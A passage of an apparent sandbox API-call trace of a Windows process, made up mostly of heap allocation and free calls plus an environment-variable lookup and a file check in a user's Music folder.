0x2aaa7c8 [0207.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0207.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0207.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0207.904] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0207.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0207.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0207.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0207.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0207.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0207.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0207.904] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0207.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0207.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0207.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0207.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0207.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0207.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0207.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0207.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0207.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0207.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0207.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0207.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0207.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0207.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0207.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0207.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0207.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f30 [0207.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0207.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0207.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0207.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0207.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0207.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0207.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0207.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0207.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0207.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0207.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0207.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0207.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0207.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0207.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72378 [0207.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0207.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0207.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0207.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0207.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0207.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0207.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0207.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0207.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0207.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0207.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0207.907] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0207.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0207.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0207.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0207.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0207.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0207.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0207.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0207.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0207.907] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0207.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0207.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0207.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0207.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0207.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0207.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0207.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0207.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0207.907] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0207.907] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0207.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0207.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0207.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0207.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0207.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0207.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0207.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0207.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0207.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0207.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.908] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0207.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0207.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0207.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0207.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0207.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0207.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0207.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0207.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0207.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0207.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0207.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0207.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0207.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0207.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0207.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0207.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0207.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0207.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0207.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0207.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0207.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0207.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0207.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0207.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0207.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0207.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0207.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0207.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0207.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0207.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0207.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0207.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0207.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0207.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0207.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0207.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0207.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0207.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0207.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0207.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0207.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0207.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0207.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0207.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0207.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0207.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0207.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0207.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0207.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0207.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0207.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0207.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0207.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0207.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0207.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0207.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0207.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0207.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0207.911] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0207.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0207.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0207.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0207.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0207.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0207.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0207.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0207.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0207.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0207.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0207.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0207.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0207.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0207.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0207.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0207.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0207.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0207.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0207.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0207.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0207.911] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\pFAB.wav", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5adf7910, ftCreationTime.dwHighDateTime=0x1d5c996, ftLastAccessTime.dwLowDateTime=0xc986ec50, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0xc986ec50, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x11605, dwReserved0=0x0, dwReserved1=0x0, cFileName="pFAB.wav", cAlternateFileName="")) returned 0x9e1bf8 [0207.912] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0207.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0207.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0207.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0207.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0207.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0207.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0207.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0207.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0207.912] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0207.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0207.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0207.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0207.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0207.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0207.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0207.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0207.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 